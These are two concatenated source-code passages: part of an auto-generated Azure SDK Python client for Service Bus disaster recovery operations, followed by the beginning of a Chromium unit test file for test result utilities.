map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs'} # type: ignore
def create_or_update(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
parameters, # type: "_models.ArmDisasterRecovery"
**kwargs # type: Any
):
# type: (...) -> Optional["_models.ArmDisasterRecovery"]
"""Creates or updates a new Alias(Disaster Recovery configuration).
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:param parameters: Parameters required to create an Alias(Disaster Recovery configuration).
:type parameters: ~azure.mgmt.servicebus.v2021_01_01_preview.models.ArmDisasterRecovery
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ArmDisasterRecovery, or the result of cls(response)
:rtype: ~azure.mgmt.servicebus.v2021_01_01_preview.models.ArmDisasterRecovery or None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.ArmDisasterRecovery"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ArmDisasterRecovery')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ArmDisasterRecovery', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}'} # type: ignore
def delete(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Deletes an Alias(Disaster Recovery configuration).
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}'} # type: ignore
def get(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ArmDisasterRecovery"
"""Retrieves Alias(Disaster Recovery configuration) for primary or secondary namespace.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ArmDisasterRecovery, or the result of cls(response)
:rtype: ~azure.mgmt.servicebus.v2021_01_01_preview.models.ArmDisasterRecovery
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ArmDisasterRecovery"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ArmDisasterRecovery', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}'} # type: ignore
def break_pairing(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""This operation disables the Disaster Recovery and stops replicating changes from primary to
secondary namespaces.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
accept = "application/json"
# Construct URL
url = self.break_pairing.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
break_pairing.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}/breakPairing'} # type: ignore
def fail_over(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
parameters=None, # type: Optional["_models.FailoverProperties"]
**kwargs # type: Any
):
# type: (...) -> None
"""Invokes GEO DR failover and reconfigure the alias to point to the secondary namespace.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:param parameters: Parameters required to create an Alias(Disaster Recovery configuration).
:type parameters: ~azure.mgmt.servicebus.v2021_01_01_preview.models.FailoverProperties
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.fail_over.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if parameters is not None:
body_content = self._serialize.body(parameters, 'FailoverProperties')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
fail_over.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}/failover'} # type: ignore
def list_authorization_rules(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.SBAuthorizationRuleListResult"]
"""Gets the authorization rules for a namespace.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SBAuthorizationRuleListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.servicebus.v2021_01_01_preview.models.SBAuthorizationRuleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SBAuthorizationRuleListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_authorization_rules.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('SBAuthorizationRuleListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_authorization_rules.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}/authorizationRules'} # type: ignore
def get_authorization_rule(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
authorization_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.SBAuthorizationRule"
"""Gets an authorization rule for a namespace by rule name.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:param authorization_rule_name: The authorization rule name.
:type authorization_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SBAuthorizationRule, or the result of cls(response)
:rtype: ~azure.mgmt.servicebus.v2021_01_01_preview.models.SBAuthorizationRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SBAuthorizationRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
accept = "application/json"
# Construct URL
url = self.get_authorization_rule.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'authorizationRuleName': self._serialize.url("authorization_rule_name", authorization_rule_name, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('SBAuthorizationRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_authorization_rule.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}/authorizationRules/{authorizationRuleName}'} # type: ignore
def list_keys(
self,
resource_group_name, # type: str
namespace_name, # type: str
alias, # type: str
authorization_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.AccessKeys"
"""Gets the primary and secondary connection strings for the namespace.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param alias: The Disaster Recovery configuration name.
:type alias: str
:param authorization_rule_name: The authorization rule name.
:type authorization_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AccessKeys, or the result of cls(response)
:rtype: ~azure.mgmt.servicebus.v2021_01_01_preview.models.AccessKeys
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AccessKeys"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
accept = "application/json"
# Construct URL
url = self.list_keys.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'alias': self._serialize.url("alias", alias, 'str', max_length=50, min_length=1),
'authorizationRuleName': self._serialize.url("authorization_rule_name", authorization_rule_name, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('AccessKeys', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_keys.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/{alias}/authorizationRules/{authorizationRuleName}/listKeys'} # type: ignore
|
|
#!/usr/bin/env vpython
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for test_result_util.py."""
import collections
import copy
import mock
import unittest
import test_result_util
from test_result_util import TestResult, TestStatus, ResultCollection
import test_runner_test
PASSED_RESULT = TestResult(
'passed/test', TestStatus.PASS, duration=1233, test_log='Logs')
FAILED_RESULT = TestResult(
'failed/test', TestStatus.FAIL, duration=1233, test_log='line1\nline2')
FAILED_RESULT_DUPLICATE = TestResult(
'failed/test', TestStatus.FAIL, test_log='line3\nline4')
DISABLED_RESULT = TestResult(
'disabled/test',
TestStatus.SKIP,
expected_status=TestStatus.SKIP,
attachments={'name': '/path/to/name'})
UNEXPECTED_SKIPPED_RESULT = TestResult('unexpected/skipped_test',
TestStatus.SKIP)
CRASHED_RESULT = TestResult('crashed/test', TestStatus.CRASH)
FLAKY_PASS_RESULT = TestResult('flaky/test', TestStatus.PASS)
FLAKY_FAIL_RESULT = TestResult(
'flaky/test', TestStatus.FAIL, test_log='line1\nline2')
ABORTED_RESULT = TestResult('aborted/test', TestStatus.ABORT)
class UtilTest(test_runner_test.TestCase):
"""Tests util methods in test_result_util module."""
def test_validate_kwargs(self):
"""Tests _validate_kwargs."""
with self.assertRaises(AssertionError) as context:
TestResult('name', TestStatus.PASS, unknown='foo')
expected_message = ("Invalid keyword argument(s) in")
self.assertTrue(expected_message in str(context.exception))
with self.assertRaises(AssertionError) as context:
ResultCollection(test_log='foo')
expected_message = ("Invalid keyword argument(s) in")
self.assertTrue(expected_message in str(context.exception))
def test_validate_test_status(self):
"""Tests exception raised from validation."""
with self.assertRaises(TypeError) as context:
test_result_util._validate_test_status('TIMEOUT')
expected_message = ('Invalid test status: TIMEOUT. Should be one of')
self.assertTrue(expected_message in str(context.exception))
def test_to_standard_json_literal(self):
"""Tests _to_standard_json_literal."""
status = test_result_util._to_standard_json_literal(TestStatus.FAIL)
self.assertEqual(status, 'FAIL')
status = test_result_util._to_standard_json_literal(TestStatus.ABORT)
self.assertEqual(status, 'TIMEOUT')
class TestResultTest(test_runner_test.TestCase):
"""Tests TestResult class APIs."""
def test_init(self):
"""Tests class initialization."""
test_result = PASSED_RESULT
self.assertEqual(test_result.name, 'passed/test')
self.assertEqual(test_result.status, TestStatus.PASS)
self.assertEqual(test_result.expected_status, TestStatus.PASS)
self.assertEqual(test_result.test_log, 'Logs')
def test_compose_result_sink_tags(self):
"""Tests _compose_result_sink_tags."""
disabled_test_tags = [('test_name', 'disabled/test'),
('disabled_test', 'true')]
unexpected_skip_test_tags = [('test_name', 'unexpected/skipped_test'),
('disabled_test', 'false')]
not_skip_test_tags = [('test_name', 'passed/test')]
not_skip_test_result = PASSED_RESULT
self.assertEqual(not_skip_test_tags,
not_skip_test_result._compose_result_sink_tags())
disabled_test_result = DISABLED_RESULT
self.assertEqual(disabled_test_tags,
disabled_test_result._compose_result_sink_tags())
unexpected_skip_test_result = UNEXPECTED_SKIPPED_RESULT
self.assertEqual(unexpected_skip_test_tags,
unexpected_skip_test_result._compose_result_sink_tags())
@mock.patch('result_sink_util.ResultSinkClient.post')
def test_report_to_result_sink(self, mock_post):
disabled_test_result = DISABLED_RESULT
client = mock.MagicMock()
disabled_test_result.report_to_result_sink(client)
client.post.assert_called_with(
'disabled/test',
'SKIP',
True,
duration=None,
test_log='',
tags=[('test_name', 'disabled/test'), ('disabled_test', 'true')],
file_artifacts={'name': '/path/to/name'})
# Duplicate calls will only report once.
disabled_test_result.report_to_result_sink(client)
self.assertEqual(client.post.call_count, 1)
disabled_test_result.report_to_result_sink(client)
self.assertEqual(client.post.call_count, 1)
faileded_result = FAILED_RESULT
client = mock.MagicMock()
faileded_result.report_to_result_sink(client)
client.post.assert_called_with(
'failed/test',
'FAIL',
False,
duration=1233,
file_artifacts={},
tags=[('test_name', 'failed/test')],
test_log='line1\nline2')
class ResultCollectionTest(test_runner_test.TestCase):
"""Tests ResultCollection class APIs."""
def setUp(self):
super(ResultCollectionTest, self).setUp()
self.full_collection = ResultCollection(test_results=[
PASSED_RESULT, FAILED_RESULT, FAILED_RESULT_DUPLICATE, DISABLED_RESULT,
UNEXPECTED_SKIPPED_RESULT, CRASHED_RESULT, FLAKY_PASS_RESULT,
FLAKY_FAIL_RESULT, ABORTED_RESULT
])
def test_init(self):
"""Tests class initialization."""
collection = ResultCollection(
test_results=[
PASSED_RESULT, DISABLED_RESULT, UNEXPECTED_SKIPPED_RESULT
],
crashed=True)
self.assertTrue(collection.crashed)
self.assertEqual(collection.crash_message, '')
self.assertEqual(
collection.test_results,
[PASSED_RESULT, DISABLED_RESULT, UNEXPECTED_SKIPPED_RESULT])
def test_add_result(self):
"""Tests add_test_result."""
collection = ResultCollection(test_results=[FAILED_RESULT])
collection.add_test_result(DISABLED_RESULT)
self.assertEqual(collection.test_results, [FAILED_RESULT, DISABLED_RESULT])
def test_add_result_collection_default(self):
"""Tests add_result_collection default (merge crash info)."""
collection = ResultCollection(test_results=[FAILED_RESULT])
self.assertFalse(collection.crashed)
collection.append_crash_message('Crash1')
crashed_collection = ResultCollection(
test_results=[PASSED_RESULT], crashed=True)
crashed_collection.append_crash_message('Crash2')
collection.add_result_collection(crashed_collection)
self.assertTrue(collection.crashed)
self.assertEqual(collection.crash_message, 'Crash1\nCrash2')
self.assertEqual(collection.test_results, [FAILED_RESULT, PASSED_RESULT])
def test_add_result_collection_overwrite(self):
"""Tests add_result_collection overwrite."""
collection = ResultCollection(test_results=[FAILED_RESULT], crashed=True)
self.assertTrue(collection.crashed)
collection.append_crash_message('Crash1')
crashed_collection = ResultCollection(test_results=[PASSED_RESULT])
collection.add_result_collection(crashed_collection, overwrite_crash=True)
self.assertFalse(collection.crashed)
self.assertEqual(collection.crash_message, '')
self.assertEqual(collection.test_results, [FAILED_RESULT, PASSED_RESULT])
def test_add_result_collection_ignore(self):
"""Tests add_result_collection overwrite."""
collection = ResultCollection(test_results=[FAILED_RESULT])
self.assertFalse(collection.crashed)
crashed_collection = ResultCollection(
test_results=[PASSED_RESULT], crashed=True)
crashed_collection.append_crash_message('Crash2')
collection.add_result_collection(crashed_collection, ignore_crash=True)
self.assertFalse(collection.crashed)
self.assertEqual(collection.crash_message, '')
self.assertEqual(collection.test_results, [FAILED_RESULT, PASSED_RESULT])
def test_add_results(self):
"""Tests add_results."""
collection = ResultCollection(test_results=[PASSED_RESULT])
collection.add_results([FAILED_RESULT, DISABLED_RESULT])
self.assertEqual(collection.test_results,
[PASSED_RESULT, FAILED_RESULT, DISABLED_RESULT])
def test_add_name_prefix_to_tests(self):
"""Tests add_name_prefix_to_tests."""
passed = copy.copy(PASSED_RESULT)
disabeld = copy.copy(DISABLED_RESULT)
collection = ResultCollection(test_results=[passed, disabeld])
some_prefix = 'Some/prefix'
collection.add_name_prefix_to_tests(some_prefix)
for test_result in collection.test_results:
self.assertTrue(test_result.name.startswith(some_prefix))
def test_add_test_names_status(self):
"""Tests add_test_names_status."""
test_names = ['test1', 'test2', 'test3']
collection = ResultCollection(test_results=[PASSED_RESULT])
collection.add_test_names_status(test_names, TestStatus.SKIP)
disabled_test_names = ['test4', 'test5', 'test6']
collection.add_test_names_status(
disabled_test_names, TestStatus.SKIP, expected_status=TestStatus.SKIP)
self.assertEqual(collection.test_results[0], PASSED_RESULT)
unexpected_skipped = collection.tests_by_expression(
lambda t: not t.expected() and t.status == TestStatus.SKIP)
self.assertEqual(unexpected_skipped, set(['test1', 'test2', 'test3']))
self.assertEqual(collection.disabled_tests(),
set(['test4', 'test5', 'test6']))
@mock.patch('test_result_util.TestResult.report_to_result_sink')
@mock.patch('result_sink_util.ResultSinkClient.close')
@mock.patch('result_sink_util.ResultSinkClient.__init__', return_value=None)
def test_add_and_report_test_names_status(self, mock_sink_init,
mock_sink_close, mock_report):
"""Tests add_test_names_status."""
test_names = ['test1', 'test2', 'test3']
collection = ResultCollection(test_results=[PASSED_RESULT])
collection.add_and_report_test_names_status(test_names, TestStatus.SKIP)
self.assertEqual(collection.test_results[0], PASSED_RESULT)
unexpected_skipped = collection.tests_by_expression(
lambda t: not t.expected() and t.status == TestStatus.SKIP)
self.assertEqual(unexpected_skipped, set(['test1', 'test2', 'test3']))
self.assertEqual(1, len(mock_sink_init.mock_calls))
self.assertEqual(3, len(mock_report.mock_calls))
self.assertEqual(1, len(mock_sink_close.mock_calls))
def testappend_crash_message(self):
"""Tests append_crash_message."""
collection = ResultCollection(test_results=[PASSED_RESULT])
collection.append_crash_message('Crash message 1.')
self.assertEqual(collection.crash_message, 'Crash message 1.')
collection.append_crash_message('Crash message 2.')
self.assertEqual(collection.crash_message,
'Crash message 1.\nCrash message 2.')
def test_tests_by_expression(self):
"""Tests tests_by_expression."""
collection = self.full_collection
exp = lambda result: result.status == TestStatus.SKIP
skipped_tests = collection.tests_by_expression(exp)
self.assertEqual(skipped_tests,
set(['unexpected/skipped_test', 'disabled/test']))
def test_get_spcific_tests(self):
"""Tests getting sets of tests of specific status."""
collection = self.full_collection
self.assertEqual(
collection.all_test_names(),
set([
'passed/test', 'disabled/test', 'failed/test',
'unexpected/skipped_test', 'crashed/test', 'flaky/test',
'aborted/test'
]))
self.assertEqual(collection.crashed_tests(), set(['crashed/test']))
self.assertEqual(collection.disabled_tests(), set(['disabled/test']))
self.assertEqual(collection.expected_tests(),
set(['passed/test', 'disabled/test', 'flaky/test']))
self.assertEqual(
collection.unexpected_tests(),
set([
'failed/test', 'unexpected/skipped_test', 'crashed/test',
'flaky/test', 'aborted/test'
]))
self.assertEqual(collection.passed_tests(),
set(['passed/test', 'flaky/test']))
self.assertEqual(collection.failed_tests(),
set(['failed/test', 'flaky/test']))
self.assertEqual(collection.flaky_tests(), set(['flaky/test']))
self.assertEqual(
collection.never_expected_tests(),
set([
'failed/test', 'unexpected/skipped_test', 'crashed/test',
'aborted/test'
]))
self.assertEqual(collection.pure_expected_tests(),
